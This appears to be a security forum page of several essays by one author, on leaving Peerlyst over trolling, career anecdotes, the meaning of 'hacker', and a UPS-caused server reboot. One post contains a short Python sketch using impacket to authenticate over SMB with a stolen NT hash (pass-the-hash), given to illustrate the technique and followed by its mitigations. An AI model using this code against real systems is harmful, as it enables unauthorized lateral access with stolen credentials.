
How to destroy a community before it's even built

Blog
  • There’s a lot you can learn about a person just by the way they present themselves online - whether that is in a positive or negative light is really up to the individual posting the content. Several of my followers have questioned why I chose to part company with Peerlyst, and here’s why. Firstly, let’s understand the word “community”. Taken literally, it means something like the following

    “The condition of sharing or having certain attitudes and interests in common.”

    Anyone calling themselves a community should abide by this basic description at all times - especially the part about “having certain attitudes”. It’s this very part of the description that is capable of destroying a community much faster than it takes to create one in the first place. It was always my dream and wish to give something back to the industry that adopted me at the age of 16 as a school leaver, and I promised myself that once I reached a plateau in my career, I would start giving something back in order to help others.

    This initial drive began in 2016 when I started writing articles for Peerlyst. The very first article I donated to the community here detailed the most common types of compromise, and what to look out for. Fairly soon, I was contacted and asked if I’d consider making this a featured resource that their community could use as a learning tool. Happily, I agreed, and began donating regular articles from my own blog for the benefit of their community. As a side point, there are several authors who write similar content for others, but it’s typically for a fee, or a mention in a larger community in order to promote that individual. This isn’t how I work. I’ve never chased glory - I get my satisfaction from those who read my articles, and engage in active discussion relating to the content.

    I always expected questions and dialogue arising from my articles. In most cases, the exchange of opinions, questions, and content in general made for a pleasant experience. Now, not every piece of creative writing inspires everyone, and I completely understand that. However, opinion can easily be divided when a specific response is used, and counterproductive if the response hasn’t been well thought out before clicking that submit button. Written content often suffers from the same central ailment: it rarely conveys tone or emotion. When you read something someone else has written, it’s impossible to gauge body language or tone of voice. For this reason, diplomacy and a careful selection of words is often a good idea (also known as “think before you post”), as is reading your input before submitting it. The first response to something isn’t always the best one, and you’ll often find yourself effectively sanitising content before you submit it after reviewing it.

    However, the story (unfortunately) doesn’t end here. I was not on the receiving end of the diatribe about to be unleashed, but watched (with a mixture of disgust and disbelief) as this whole scenario unfolded. The focal point of the discussion was this post

    Some of the comments left for the author of this post were, in my view, nothing short of disgusting. Here’s the opening comment

    Those are great academic credentials. Let’s talk about “in the trenches” experience. Were you ever an engineer or specialist hunting threats and vulnerabilities? Run a NESSUS scan? Perform threat mitigation? Get called at 3AM because your network was hacked? What I am seeing is a professional test taker and academic. Perhaps with a photographic memory and tons of charisma? Getting a PhD at an early age and knowing 5 different languages leads me to believe the previous sentence.

    Where is the actual, bonafide experience? As for your “acting chief information security officer for regulated businesses”, again, where is the actual experience? Anyone can be a CISO including a person with a Music background. Just saying.

    There was a comment from the original author of this post, but it has since been removed. It was essentially threatening the author of the above comment with a lawsuit for defamation of character. Unsurprisingly, the response below was then posted

    Feel free. I am well known on here. And your lawyer can contact me at the provided address. If you were truly serious, you would offer the proof I am requesting. I will gladly acknowledge your certification and knowledge when the proof is provided. But you have not done so and that is an indication of your true meaning. I doubt your certification as a CISSP and you have done nothing to prove me wrong. The truth is your only defense.

    I don’t claim to be an airplane pilot. I could not tell you how to land a 737. Why should you be any exemption to that? You claim to be a cybersecurity expert with a CISSP requiring 4 years of actual experience. Where is it? If you will acknowledge that experience, I will not only accept it, I will endorse you.

    Have you “attorney” bring suit against me here in the US (I’ll never travel to Singapore so that doesn’t matter). Have him/her contact me at my stated email address. I will gladly share my physical mailing address for service of process. I’ll encourage service! Let’s go to court. Perhaps I know the laws better than you in the US not to mention cybersecurity.

    As for Peerlyst, maybe they will see it fit to remove an individual who is a poser. A fake. A charlatan through her own lack of admissions. If they ask me to be silent on this, I will honour their request. It is their site after all. Guess we will need to wait and see.

    Is this really necessary ? Since when did we consider it appropriate to behave like Neanderthals by publicly humiliating someone else, then dragging their reputation through the mud ? This is when a so-called community deteriorates into a battlefield, and if the moderators do not make an effort to ring-fence “debates” like this, they quickly spiral out of control and dramatically damage what the community set out to build in the first place. The best way to extinguish this particular situation is to disable the comments for that post. As a moderator, this is one of the immediate mechanisms to prevent brand damage. However, this course of action was not taken, and incredibly, the moderators chose to actually engage in the debate. This was not a wise choice, as the participants then started to respond to the interjection and went off track in the process. Mediation is a powerful tool when running a community, but its effectiveness is severely impacted when you decide to air dirty laundry in public. Why on earth would you want to engage in a debate with someone when they are clearly trolling someone else ? You’re supposed to actually prevent that from happening, in my view. And this is the real reason why I will never write for Peerlyst again. They have knowingly damaged their own community - effectively allowing someone else to poison its integrity and standing as a reliable information source. Two other people have contacted me since my LinkedIn post announcing that I no longer write for Peerlyst, and expressed the same reasons as those stated above.

    And so, on the 15th of November, I invoked my version of “Article 50” and decided to leave the Peerlyst community by deactivating my account - effectively exercising my Right To Be Forgotten. For those who don’t fully understand the meaning of this, here’s a snippet supplied by the ICO

    The right to erasure is also known as ‘the right to be forgotten’. The broad principle underpinning this right is to enable an individual to request the deletion or removal of personal data where there is no compelling reason for its continued processing.

    I was contacted by Peerlyst the following day asking why I had deleted my account. I’m not convinced they were genuinely sorry to have lost a member - rather, they were more concerned that the content I had contributed over time had also been deleted as part of the account deactivation procedure. Here are some of the comments I received

    “I’m sorry to hear that you decided to leave for this reason. I understand you have your own initiative, which I hope will work well for you. However, removing the content which serves 100,000 monthly readers and 500,000 unique readers is a pity for those who come to Peerlyst to learn”

    My response was that all content I had previously provided is posted on my own site. It’s actually my work, and Peerlyst are no longer permitted to use it. I was also asked if I would leave my account in place so that they could retain the content. This concerns me somewhat, as it would imply the content hasn’t actually been deleted, but “moved off the site to somewhere else”. I have asked Peerlyst to confirm that the data has been removed - so far, there has not been any response. I guess they have until May 2018 to delete it in order to be in full compliance from the GDPR standpoint.

    The other comment I received was

    “So sad to see you deactivated your account. You used to believe in the mission of sharing everything to help people improve!?”

    My response…

    “And I still do. Just not for Peerlyst”.

    The point I’ll make here is as follows. For a community to succeed it has to have a solid foundation, and a clearly defined policy. There isn’t much to the policies I put together, and they can be found here.

    https://sudonix.org/policies

    Based on what I saw on Peerlyst, I felt the need to update these accordingly. Take a look for yourself. I personally want to mentor the next generation of InfoSec professionals, not get into a pathetic “s**t slinging” match that yields no real benefit whatsoever. I’ve also been contacted by one of the moderators - evidently, Peerlyst’s CEO (at the time - they are now defunct) wanted to have a call with her to discuss this. Too little, too late, I’m afraid. The damage is done. I don’t want an apology as one isn’t needed. I don’t want a discussion as nothing will change. In reality, I refuse to associate my name or any of my content with a so-called community that is effectively endorsing one of the worst online experiences we have to date - trolling.

  • @phenomlab I am sorry to hear about your experience. I fully support your decision, and I believe it is a waste of time to spend one more minute in those kinds of environments anyway. As you said, the attitudes of the moderators are very important. Even if you can bring a lot of talented people together, if you cannot maintain the atmosphere of the community, it will not lead anywhere good. Moderators and admins are quite important; if they are not competent, the community is doomed.

    I guess we can think of this as movie remakes that are much worse than the originals… Just because you have a great screenplay and better actors, it does not mean the movie will be directed better. With worse directors/directing, you can end up with worse movies like Psycho, The Shining, and The Mummy… The remakes are terrible in each case - The Mummy remake even had Tom Cruise in it, but it is way worse than the original 😄 So, it is clear that the “director” (the moderators) is quite key.

  • I can appreciate how much your relationship with them meant to you, and how frustrating it would have been that they didn’t recognise all your efforts. You can come across similar folks in pubs, where the world is like that. If you find time, you can read “They have the right to believe what they want to believe”.

  • @crazycells I guess the worst part for me was the trolling - made so much worse by the fact that the moderators allowed it to continue, insisting that the Peerlyst community was setting an example by allowing the community to “self moderate”. Such a statement is completely ridiculous, and it wasn’t until someone other than myself pointed out that all of this toxic activity could in fact be crawled by Google that they decided to step in and start deleting posts.

    In fact, it reached a boiling point where the CEO herself had to step in and post an article stating their justification for “self moderation” which simply doesn’t work.

    The evidence here speaks for itself.


  • 0 Votes
    1 Posts
    191 Views


    I’ve been a veteran of the infosec industry for several years, and during that time, I’ve been exposed to a wide range of technology and situations alike. Over this period, I’ve amassed a wealth of experience around information security, physical security, and systems. 18 years of that experience has been gained within the financial sector - the remainder spread across manufacturing, retail, and several other areas. I’ve always classed myself as a jack of all trades, and a master of none. The real reason for this is that I wanted to gain as much exposure to the world of technology as possible without “shoehorning” myself - pigeonholing my career and restricting my overall scope.

    I learned how to both hack and protect 8086 / Z80 systems back in 1984, and was using “POKE” well before Facebook coined the phrase and made it trendy. One of the actual commands I still remember to this day, which rendered the CTRL, SHIFT, ESC break sequence useless, was

    POKE &bdee, &c9

    I spent my youth dissecting systems and software alike, understanding how they worked, and more importantly, how easily they could be bypassed or modified.

    Was I a hacker in my youth ? If you understand the true meaning of the word, then yes - I most definitely was.

    If you think a hacker is a criminal, then absolutely not. I took the various skills I had obtained over the years, honed them, and made myself into a walking information source - a living, breathing technology encyclopedia that could be queried simply by asking a question (but not vulnerable to SQL injection).

    Over the years, I took an interest in all forms of technology, and was deeply immersed in the “virus era” of the 2000s. I already understood how viruses worked (after dissecting hundreds of them in a home lab), and the level of damage one could inflict paved the way for a natural progression to early and somewhat infantile malware. In its earliest form, this malware was easily spotted and removed. Today’s campaigns see code that will delete itself after successful execution, leaving little to no trace of its activity on a system. Once the APT (Advanced Persistent Threat) acronym became mainstream, the world and its brother realised they had a significant problem on their hands, and needed to respond accordingly. I’d realised early on that one of the best defences against the ever advancing malware was containment. If you “stem the flow”, you reduce the overall impact - essentially, restricting the malicious activity to a small subset rather than your entire estate.

    I began collaborating with various stakeholders in the organisations I worked for over the years, carefully explaining how modern threats worked and the level of damage they could inflict - initially from an information and financial perspective, extending to reputational damage and a variety of other areas as campaigns increased in their complexity. I recall one incident during a tenure within the manufacturing industry where I provided a proof of concept. At the time, I was working as a pro bono consultant for a small company, and I don’t think they took me too seriously.

    Using an existing and shockingly vulnerable Windows 2003 server (it was still using the original settings in terms of configuration - they had no patching regime, meaning all systems were effectively vanilla), I demonstrated how simple it would be to gain access first to this server, then steal the hash - effortlessly using that token to gain full access to other systems without even knowing the password (pass the hash). A very primitive exercise by today’s standards, but effective nonetheless. I explained every step of what I was doing along the way, and then explained how to mitigate this simple exploit - I even provided a step by step guide on how to reproduce the vulnerability, how to remediate it, and my recommendations for the necessary steps to enhance security across their estate. Their response was, frankly, shocking. Not only did they attempt to refute my findings, but at the same time, they dismissed them as trivial - effectively brushing the whole thing under the carpet. This wasn’t a high profile entity, but the firm in question was AIM listed, and by definition, duty bound - they had a responsibility to shareholders and stakeholders to resolve this issue. Instead, they remained silent.
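
    For illustration only, here’s a minimal sketch of the idea behind that “pass the hash” demonstration. It assumes the open source impacket library is installed, and every host, account, and hash value shown is a hypothetical placeholder - this is the concept, not the original proof of concept.

    # Minimal pass-the-hash sketch using the impacket library (pip install impacket).
    # All hosts, accounts, and hash values below are hypothetical placeholders.
    from impacket.smbconnection import SMBConnection

    TARGET   = "192.0.2.10"                               # placeholder server
    USERNAME = "Administrator"                            # placeholder account
    NT_HASH  = "31d6cfe0d16ae931b73c59d7e0c089c0"         # placeholder NT hash

    def pass_the_hash(target: str, user: str, nthash: str) -> None:
        """Authenticate to SMB using an NT hash instead of a password."""
        conn = SMBConnection(target, target)
        # No password is supplied - the stolen hash alone satisfies NTLM
        # authentication, which is why hash theft on one box endangers others.
        conn.login(user, "", domain="", lmhash="", nthash=nthash)
        print("Authenticated - %d shares visible" % len(conn.listShares()))
        conn.logoff()

    if __name__ == "__main__":
        pass_the_hash(TARGET, USERNAME, NT_HASH)

    The usual mitigations - patching, SMB signing, disabling NTLM where possible, and never reusing local administrator passwords - all exist to break exactly this kind of replay.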

    Being pro bono meant that my role was an advisory one, and I wasn’t charging for my work. The firm had asked me to perform a security posture review, yet somehow, didn’t like the result when it was presented to them. I informed them that they were more than welcome to obtain another opinion, and should process my findings as they saw fit. I later found out through a mutual contact that my findings had been dismissed as “unrealistic”, and another consultant had certified their infrastructure as “safe”. I almost choked on my coffee, but wrote this off as a bad experience. Two months later, I got a call from the same mutual contact telling me that my findings were indeed correct. He had been contacted by the same firm asking him to provide consultancy for what, on the face of it, looked like a compromised network.

    Then came the next line which I’ll never forget.

    “I don’t suppose you’d be interested in……”

    I politely refused, saying I was busy on another project. I actually wasn’t, but refused out of principle. And so, without further ado, here’s my synopsis

    “…if you choose not to listen to the advice a security expert gives you, then you are leaving yourself and your organisation unnecessarily vulnerable. Ignorance is not bliss when it comes to security…”

    Think about what you’ve read for a moment, and be honest with me - say so if you think this statement is harsh given the previous content.

    The point I am trying to make here is that it is extremely frustrating to make a sustained effort, valiantly attempt to raise awareness, and constantly tell people they have gaping holes in their systems, only for them to ignore the advice (and the fix I’ve handed to them on a plate). Those in the InfoSec community are duty bound to responsibly disclose, inform, educate, raise awareness, and help protect, but that doesn’t extend to wiping people’s noses and telling them it wasn’t their fault that they failed to follow simple advice that probably could have prevented their inevitable breach. My response here is that if you bury your head in the sand, you won’t see the guy running up behind you intent on kicking you up the ass.

    Security situations can easily be avoided if people are prepared to actually listen and heed advice. I’m willing to help anyone, but they in return have to be equally willing to listen, understand, and react.

  • 0 Votes
    1 Posts
    205 Views


    One of many issues with working in the Infosec community is the inevitable backlash you’ll come across almost on a daily basis. In this industry, and probably hundreds of others like it, there are those who have an opinion. There’s absolutely nothing wrong with that, and it’s something I always actively encourage. However, there’s a fine line between what is considered to be constructive opinion and what comes across as a bigoted approach. What I’m alluding to here is the usage of the word “hacker” and its context. I’ve written about this particular topic before, which, so it seems, pressed a few buttons that “shouldn’t be pressed”.

    But why is this ?

    The purpose of this article is definition. It really isn’t designed to “take sides” or cast aspersions over the correct usage of the term, or which scenarios and paradigms it is used correctly or incorrectly against. For the most part, the term “hacker” seems to be seen as positive in the Infosec community, and based on this, the general consensus is that there should be greater awareness of the differences between hackers and threat actors, for example. The issue here is that not everyone outside of this arena is inclined to agree. You could argue that the root of this issue is mainly attributed to the media and how they portray “hackers” as individuals who pursue nefarious activity and use their skills to commit crime and theft on a grand scale by gaining illegal access to networks. On the one hand, the image of hoodies and faceless individuals has created a positive awareness and a sense of caution amongst the target groups – these being everyday users of civilian systems and corporate networks alike, and with the constant stream of awareness campaigns running on a daily basis, this paradigm serves only to perpetuate rather than diminish. On the other hand, if you research the definition of the term “hacker” you’ll find more than one returned.

    Is this a fair reflection of hackers ? To the untrained eye, picture number 2 probably creates the most excitement. Sure, picture 1 looks “cool”, but it’s not “threatening” as such, as this is clearly the image the media wants to display. Essentially, they have probably taken this stance to increase awareness of an anonymous and faceless threat. But, it ISN’T a fair portrayal.

    Current definitions of “the word”

    The word “hacker” has become synonymous with criminal activity to the point where it cannot be reversed - certainly not overnight, anyway. The media attention cannot be directly blamed either, in my view; without these types of campaigns, the impact of such a threat wouldn’t be taken seriously if a picture of a guy in a suit (state sponsored) was used. The hoodie is representative of an unknown masked assailant, and its creation is for awareness - for those who have no real understanding of what a hacker should look like - hence my original article. As I highlighted above, we live in a world where a picture speaks a thousand words.

    The word hacker is always going to be associated with nefarious activity, and that’s never going to change, regardless of the amount of effort that would be needed to re-educate pretty much the entire planet. Ask anyone to define a hacker and you’ll get the same response. It’s almost like trying to distinguish the difference between a full blown criminal and a “lovable rogue”, or insisting that people in hoodies aren’t trouble-making adolescent thugs.

    Ultimately, it’s far too ingrained - much like the letters that flow through a stick of rock found at UK seaside resorts. It doesn’t matter how much you break off; the lettering exists throughout the entire stick whether you want it to or not. To make a real change, and most importantly, have the media (and by extension, everyone else) realise they have made a fundamental misjudgement, we should look at realistic definitions.

    The most notable is the following, taken from TechTarget

    A hacker is an individual who uses computer, networking or other skills to overcome a technical problem. The term hacker may refer to anyone with technical skills, but it often refers to a person who uses his or her abilities to gain unauthorized access to systems or networks in order to commit crimes. A hacker may, for example, steal information to hurt people via identity theft, damage or bring down systems and, often, hold those systems hostage to collect ransom.

    The term hacker has historically been a divisive one, sometimes being used as a term of admiration for an individual who exhibits a high degree of skill, as well as creativity in his or her approach to technical problems. However, the term is more commonly applied to an individual who uses this skill for illegal or unethical purposes.

    One great example of this is that hackers are not “evil people”, but are in fact industry professionals and experts who use their knowledge to raise awareness by conducting proof of concept exercises and providing education and awareness around the millions of threats that we are exposed to on an almost daily basis. So why does the word “hacker” strike fear into those unfamiliar with its true meaning ? The reason for this unnecessary phenomenon isn’t actually the media alone (although they have contributed significantly to its popularity). It’s perception. You could argue that the media have made this perception worse, and to a degree, this would be true. However, they didn’t actually create the original association - MIT claimed that trophy and gave the term the “meaning” it has to this day. Have a look at this

    MIT Article

    Given that the origins of this date back to 1963, the media cannot be blamed for creating the seemingly incorrect original reference - it’s fairly obvious that they didn’t. The “newspaper” referenced in the link is a campus circulation, and as far as I can see was never designed for public consumption. Here’s a quote from that article:

    “Many telephone services have been curtailed because of so-called hackers, according to Professor Carleton Tucker, administrator of the Institute telephone system.

    The students have accomplished such things as tying up all the tie-lines between Harvard and MIT, or making long-distance calls by charging them to a local radar installation. One method involved connecting the PDP-1 computer to the phone system to search the lines until a dial tone, indicating an outside line, was found.”

    The “so-called hackers” alignment here originally comes from “Phreaking” – a traditional method of establishing control over remote telephone systems allowing trunk calls, international dialling, premium rates, etc, all without the administrator’s knowledge. This “old school” method would certainly no longer work with modern phone systems, but is certainly “up there” with the established activity that draws a parallel with hacking.

    Whilst a significant portion of blogs, security forums, and even professional security platforms continue to use images of hoodies, faceless individuals, and the term “hacker” in the criminal sense, this is clearly a misconception - unfortunately one that connotation itself has allowed to set in stone like King Arthur’s Excalibur. In fairness, cyber criminals are mostly faceless individuals, as nobody can actually see them commit a crime, and we only realise they are in fact normal people once they are discovered, arrested, and brought to trial for their activities. However, the term “hacker” is being misused on a grand scale - and has been since the 1980s.

    An interesting observation here is that hoodies are intrinsically linked to threatening behaviour. A classic example of this is here. This really isn’t misrepresentation by the media in this case - it’s an unfortunate reality that is on the increase. Quite who exactly is responsible for putting a hacker in a hoodie is something of a discussion topic, but hackers were originally seen as “Cyberpunks” (think Matrix 1) until the media stepped in, at which point they were suddenly seen as skateboarding kids in hoodies. And so, the image we know (and hackers loathe) was born. Perhaps one “logical” perspective for hoodies and hackers could be the anonymity the hoodie supposedly affords.

    The misconception of the true meaning of “hacker” has damaged the Infosec community extensively in terms of what should be a “no chalk” line between what is criminal, and what isn’t. However, it’s not all bad news. True meaning aside, the level of awareness around the nefarious activities of cyber criminals has certainly increased, but until we are able to establish a clear demarcation between ethics in terms of what is right and wrong, those hackers who provide services, education, and awareness will always be painted in a negative light, and by inference, be “tarred with the same brush”. Those who pride themselves on being hackers should continue to do so in my view – and they have my full support.

    It’s not their job solely to convince everyone else of their true intent, but ours as a community.

    Let’s start making that change.

  • 0 Votes
    1 Posts
    219 Views

    Every once in a while, you encounter a repetitive issue that, no matter what you try to do to resolve it, manifests itself over and over again - sometimes, even on a daily basis. Much of how the issue is remediated really depends on the person assigned to the task.

    You might be puzzled at why I’d write about something like this, but it’s a situation I see constantly - one I like to refer to as “over thinker syndrome”. What do I mean by this ? Here’s the theory. Some people are very analytical when it comes to problem solving. Couple that with technical knowledge and you could land up with a situation where something relatively simple gets blown out of all proportion, because the scenario played out in the mind is often much further from reality than you’d expect. And the technical reasoning is usually always to blame. Sometime around 2007, a colleague noticed that the Exchange Server (2003, wouldn’t you know) would suddenly reboot half way through a backup job. Rightly so, he wanted to investigate and asked me if this would be ok. Anyone with an ounce of experience knows that functional backups are critical in the event of a disaster - none more so than I - so obviously, I gave the go ahead. One bright spark in my team suggested a reboot of the server, which immediately prompted the response

    “…it’s rebooting itself every day, so how will that help ?”

    The investigation

    Joking aside, we’ve all heard the “have you rebooted” question touted at some point during helpdesk discussions, but this one was different. A system rebooting itself is usually symptomatic of an underlying issue somewhere, and my team member was ready for the task ahead. Stepping up to the plate, he asked if it was ok to install some monitoring software on the server. Usually, installing additional software components on a production server without testing first is a non-starter, but seeing as we needed to get this resolved as quickly as possible to reinstate the nightly backup (which incidentally hadn’t run successfully for 3 days by this point), I provided approval to proceed without question. There’s a leap of faith at this point, as you could cause more problems than you actually set out to resolve in the first place, but, as with anything related to information technology, sometimes you have to accept an element of risk. The software itself was actually for the RAID controller and motherboard. The assigned technician had already decided it was related to something along the lines of a faulty RAM module, or perhaps an issue with the controller itself. My thoughts already leaned elsewhere at this point - if the server reboots itself at exactly the same time every day, then there is an established pattern which should be investigated first. It’s a logical approach, but it’s a common trait for technical support staff to sometimes think outside of the box - or in this case, outside of the building. Not wanting to push my opinion, or trample on anyone’s toes, I decided to remain quiet and see just how far this would go before intervention was required.

    In this case, not very far. The following morning, after another unannounced nightly reboot, the error “the previous shutdown at [insert time and date here] was unexpected” showed up in the event log. No real surprises there, and once again, at exactly the same time as the previous night. I asked my technician for an update, and he informed me that he believed the memory was faulty and was somehow causing the server to blue screen and reboot. That was actually a reasonable response, so I commended him on his research and findings, but also reminded him to perform a manual backup so that we at least had something to revert to in the event of a failure. Later that afternoon, the same tech approached me and said that he had ordered some replacement memory, and wanted to arrange downtime to fit it. Trying to keep a poker face and remain passive, I agreed, and the memory was replaced the same evening around 10pm. At 2am the following morning, kaboom ! - the server rebooted itself again. Not wanting to admit defeat, our courageous tech suggested that the problem could be due to the system overheating. Another fair point, but not realistic, as you’d see this in the event log as a thermal shutdown. I willingly entertained this, and allowed investigations into the CPU temperature to begin - after another manual backup. Unsurprisingly, the temperature data returned no smoking gun, so that was abandoned. The next port of call was to reapply the service pack. Now, I’ll admit that this used to fix a multitude of issues under Windows NT Server (particularly Service Pack 4), but not under Windows 2003. I declined this for obvious reasons - if you reapply the service pack, you run the risk of overwriting key DLL files that could (and often will) render Exchange inoperable. Not being prepared to introduce an unprecedented risk into what was already becoming something of a showcase, I suggested that we look elsewhere.

    The exasperation

    The final (and honestly, more realistic) suggestion was to enable verbose logging in Exchange. This is actually a good idea, but only if you suspect that the information store could be the issue. Given the evidence, I wasn’t convinced. If there was corruption in the store, or on any of the disks, this would show itself randomly throughout the day and wouldn’t wait until 2am in the morning. Not wanting to come across as condescending, I agreed, but at the same time, set a deadline for escalation. I wasn’t overly concerned about the backups, as these were being completed manually each day whilst the investigations were taking place. Neither was I concerned at what could be seen at this point as wasting someone’s time when you think you may have the answer to what now seemed to be an impossible problem. This is where experience will eclipse any formal qualifications hands down. Those with university degrees may scoff at this, but those with substantially analytical thinking patterns seem to avoid logic like the plague and go off on a wild tangent looking for a dramatically technical explanation and solution to a problem when it’s much simpler than you’d expect. Hence the title of this article - avoid the “bulldozer to find a china cup” scenario. After witnessing another pained expression on the face of my now exasperated and exhausted tech, I said “let’s get a coffee”. In agreement, he followed me to the kitchen and then asked me what I thought the problem could be. I said that if he wanted my advice, it would be to step back and look at this problem from a logical angle rather than a technical one. The confused look I received was priceless - the guy must have really thought I’d lost the plot. After what seemed like an eternity (although in reality only a few seconds), he asked me what I meant by this. “Come with me”, I said. Finishing his coffee, he diligently followed me to the server room. Once inside, I asked him to show me the Exchange Server. Puzzled, he correctly pointed out the exact machine. I then asked him to trace the power cables and tell me where they went.

    As with most server rooms, locating and identifying cables can be a bit of a challenge after equipment has been added and removed, so this took a little longer than we expected. Eventually, the tech traced the cables back to

    …an old looking UPS that had a red light illuminated at the front like it had been a prop in a Terminator film.

    The realisation

    Suddenly, the real cause of this issue dawned on the tech like a morning sunrise over the Serengeti. The UPS that the Exchange Server was unexpectedly connected to had a faulty battery. The UPS was conducting a self test at 2am each morning, and because the bypass test failed owing to the burnt-out battery, the connected server lost power, then started back up once the offending equipment left bypass mode and went back online.

    Where is this going, you might ask ? Here’s the moral of this particular story (and many others like it)

    • Just because a problem involves technology, it doesn’t mean that the answer has to be a complex technical one
    • Logic and common sense have a part to play in all of our lives. Sometimes, it makes more sense just to step back, take a breath, and see something for what it really is before deciding to commit
    • It’s easy to allow technical expertise to cloud your judgement - don’t fall into the trap of using a sledgehammer to break an egg
    • You cannot buy experience - it’s earned, gained, and leaves an indelible mark

    Let’s hear your views. Did you ever come across a situation where no matter what you tried, nothing worked ? Did the solution turn out to be much simpler than you’d have ever thought ?

  • 0 Votes
    1 Posts
    162 Views

    I read an article by Glenn S. Gerstell (Mr. Gerstell is the general counsel of the National Security Agency) with a great deal of interest. That same article is detailed below

    The National Security Operations Center occupies a large windowless room, bathed in blue light, on the third floor of the National Security Agency’s headquarters outside of Washington. For the past 46 years, around the clock without a single interruption, a team of senior military and intelligence officials has staffed this national security nerve center.

    The center’s senior operations officer is surrounded by glowing high-definition monitors showing information about things like Pentagon computer networks, military and civilian air traffic in the Middle East and video feeds from drones in Afghanistan. The officer is authorized to notify the president any time of the day or night of a critical threat.

    Just down a staircase outside the operations center is the Defense Special Missile and Aeronautics Center, which keeps track of missile and satellite launches by China, North Korea, Russia, Iran and other countries. If North Korea was ever to launch an intercontinental ballistic missile toward Los Angeles, those keeping watch might have half an hour or more between the time of detection to the time the missile would land at the target. At least in theory, that is enough time to alert the operations center two floors above and alert the military to shoot down the missile.

    But these early-warning centers have no ability to issue a warning to the president that would stop a cyberattack that takes down a regional or national power grid or to intercept a hypersonic cruise missile launched from Russia or China. The cyberattack can be detected only upon occurrence, and the hypersonic missile, only seconds or at best minutes before attack. And even if we could detect a missile flying at low altitudes at 20 times the speed of sound, we have no way of stopping it.

    Something I’ve been saying all along is that technology alone cannot stop cyber attacks. Often referred to as a “silver bullet” or “blinky lights”, new technology carries the misconception that by purchasing that new, shiny device, you’re completely secure. Sorry folks, but this just isn’t true. Cyber crime, and its associated plethora of hourly attacks, is evolving at an alarming rate - much faster than you’d like to believe.

    You’d think that for all the huge technological advances we have made in this world, the almost daily plethora of corporate security breaches, high profile data loss, and individuals being scammed every day would have dropped down to nothing more than a trickle - even to the point where they became virtually non-existent. We are making huge progress with landings on Mars, autonomous space vehicles, artificial intelligence, big data, machine learning, and essentially reaching new heights on a daily basis thanks to some of the most creative minds in this technological sphere. But somehow, we have lost our way, stumbled and fallen - mostly on our own sword. But why ?

    Just like the Y2K gold rush in the late 90s, information security has become the next big thing, with companies ranging from startups with a few employees to enterprise organisations touting their services and platforms as the best in class, and the next “must have” tool in the blue team’s already bulging arsenal. Tools that on their own have little effect unless they are combined with something else equally as expensive to run. We’ve spent so much time focusing on everything from which SIEM solution we need to what will be labelled as the ultimate silver bullet capable of eliminating the threat of attack once and for all that, in my opinion, we have lost sight of the original goal. Regulatory requirements and best practice push us towards products and services that either require additional staff to manage, or are incredibly expensive to deploy and ultimately run. Supposedly, in an effort to simplify the management, analysis, and processing of millions of logs per hour, we’ve created even more platforms to ingest this data in order to make sense of it.

    In reality, all we have created is a shark infested pool where larger companies consume up and coming tech startups for breakfast to ensure that they do not pose a threat to their business model / gravy train, therefore enabling them to dominate the space even further with their newly enhanced reach.

    How did we get to this ? What happened to thought process and working together in order to combat the threat that increases on an hourly basis ? We seem to be so focused on making sure that we aren’t the next organisation to be breached that we have lost the art of communication and the full benefit of sharing information so that it assists others in their journey. We’ve become so obsessed with the daily onslaught of platforms that we no longer seem to have the time to even think, let alone take stock and regroup - not as an individual, but as a community.

    There are a number of “communities” that offer “free” forums and products under the open source banner, but sadly, these seem to be turning into paid-for products at a rate of knots. I understand people need to live and make money, but if awareness was raised to the point where users wouldn’t click links in phishing emails, fall for the fake emergency wire transfer request from the CEO, or be suddenly tempted by the latest offer in terms of cheap technology, then we might - just might - be able to make the world a better place. In order to make this work, we first need to remove the stigma that has become so ingrained by the media and set in stone like King Arthur’s Excalibur. Let’s start with the hacker / criminal parallel. They aren’t the same thing, folks.

    Nope. Not at all. Hackers are those people who find ingenious ways of getting into networks and infrastructure that you never even knew existed, trick you into parting with sensitive information (then inform you as to where you went wrong), and most importantly, educate you so that you and your network are far more secure against real attacks and real criminals. These people exist to increase your awareness, and by definition, security footprint - not use it against you in order to steal. Hackers do like to wear hoodies as they are comfortable, but you won’t find one using gloves, wearing a balaclava or sunglasses, and in some cases, they actually prefer desktops rather than laptops.

    The image being portrayed here is one perpetuated by the media, and it has certainly been effective - but not in a positive way. The word “hacker” is now synonymous with criminals, where it really shouldn’t be. One defines security, whereas the other sets out to break it. If we locked up all the hackers on this planet, we’d only have the blue team remaining. It’s the job of the red team (hackers) to see how strong your defences are. Hackers exist to educate, not infiltrate (at least, not without asking for permission first :))

    I personally have lost count of how many times I’ve sat in meetings where a sales pitch around a security platform is touted as a one stop shop or a Swiss army knife that can protect your entire network from a breach. Admittedly, there’s some great technology on the market that performs a variety of functions to protect your estate, but they all fail to take into consideration the weakest link in any chain - users. Irrespective of bleeding edge “combat platforms” (as I like to refer to them), criminals are becoming very adept in their approach, leveraging techniques such as social engineering. It should come as no surprise for you to learn that this type of attack can literally walk past your shiny new defence system as it relies on the one vulnerability you cannot predict - the human. Hence the term “hacking humans”.

    I’m of the firm opinion that if you want to outsmart a criminal, you have to think like one. Whilst newfangled platforms are created to assist in the fight against cyber crime, they are complex to configure, suffer from alerting bloat (far too many emails so you end up missing the one where your network is actually being compromised), or are simply overwhelming and difficult to understand. Here’s the thing. You don’t need (although they do help) expensive bleeding edge platforms with flashing lights to tell you where weak points lie within your network, but you do need to understand how a criminal can and will exploit these. A vulnerability cannot be leveraged if it no longer exists, or even better, never even existed to begin with.

    And so, on with the mission, and the real reason as to why I created this site. I’ve been working in information technology for 30 years, and have a very strong technical background in network design and information security.

    What I want to do is create a communication, information, and awareness sharing platform. I created the original concept of what I thought this new community should look like in my head, but it’s taken a while to finally develop it, get people interested, and on board. To my mind, those from inside and outside of the information security arena will pool together, share knowledge, raise awareness, and - probably most important of all - harness this new found force and drive change forward.

    The breaches we are witnessing on a daily basis are not going to simply stop. They will increase dramatically in their frequency, and will get worse with each incident.

    Let’s stop the “hackers are criminals” myth, start using our own unique talents in this field, and make a community that

    • is able to bring effective change
    • treats everyone as equals

    The community, once fully established, could easily be the catalyst for change - both in perception, and inception.

    Why not wield the stick for a change instead of being beaten with it, and work as a global virtual team instead ?

    Will you join me ? In case I haven’t already mentioned it, this initiative has no cost - only gains. It is entirely free.

  • 0 Votes
    1 Posts
    186 Views

